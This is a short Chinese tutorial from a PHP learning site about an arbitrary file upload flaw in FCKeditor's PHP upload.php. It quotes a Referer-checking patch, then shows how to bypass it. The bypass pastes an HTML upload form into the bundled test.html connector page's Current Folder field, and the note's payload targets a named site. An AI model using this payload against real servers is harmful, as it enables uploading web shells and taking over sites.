来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php网上给出的修复方案是修复方法,删除FCK编辑器用其他的编辑器或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文......
|
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php
网上给出的修复方案是
修复方法,删除FCK编辑器用其他的编辑器
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
在
require(‘config.php’);
require(‘util.php’);
的下面添加以下代码—————————–
//防止外部提交
function outsidepost()
{
$servername=$_SERVER['SERVER_NAME'];
$sub_from=@$_SERVER['HTTP_REFERER'];
$sub_len=strlen($servername);
$checkfrom=substr($sub_from,7,$sub_len);
if($checkfrom!=$servername){
echo(“you don’t outsidepost!”);
exit;
}
}
outsidepost();
防止外部提交,但是没有防止内部提交,
利用方法:
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html
2,在Current Folder 框输入
<form id=frmUpload enctype=multipart/form-data action=http:// www.2cto.com /editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
修复:见上一句 |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
